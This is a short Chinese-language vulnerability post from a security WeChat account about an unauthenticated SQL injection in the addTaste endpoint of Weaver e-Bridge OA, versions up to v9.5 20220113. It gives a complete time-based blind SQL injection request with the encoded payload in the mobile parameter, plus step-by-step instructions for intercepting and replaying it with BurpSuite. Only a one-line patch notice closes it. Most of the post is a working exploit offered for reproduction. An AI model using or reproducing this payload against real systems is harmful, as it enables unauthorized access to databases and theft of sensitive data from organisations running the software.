微信公众号:不秃头的安全
漏洞详情:
泛微云桥e-Bridge OA是一种基于云计算和移动互联网技术的企业办公自动化(OA)解决方案。它由中国的企业软件开发公司泛微软件开发,旨在帮助企业实现高效的办公管理和协同工作。由于泛微云桥e-Bridge平台addTaste接口存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取数据库权限及数据库的敏感数据。
影响范围
泛微云桥 e-Bridge <= v9.5 20220113
漏洞利用
GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Cookie:EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18;slsession=BmCjG8ZweGWzoSGpQ1QgQg==;EBRIDGE_JSESSIONID=21D2D790531AD7941D060B411FABDC10
Accept-Encoding: gzip
SL-CE-SUID: 25
使用方法:1、打开泛微云桥e-Bridge登录首页,使用BurpSuite拦截请求包
2、将抓到的请求包进行修改,将GET内容修改为POC的GET:/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
3、其他内容不修改,然后放包后即可复现。漏洞修复建议目前官方已发布安全更新,受影响用户可通过官网安装补丁更新。官方下载地址:https://www.weaver.com.cn/subpage/aboutus/news/news-detail.html?id=934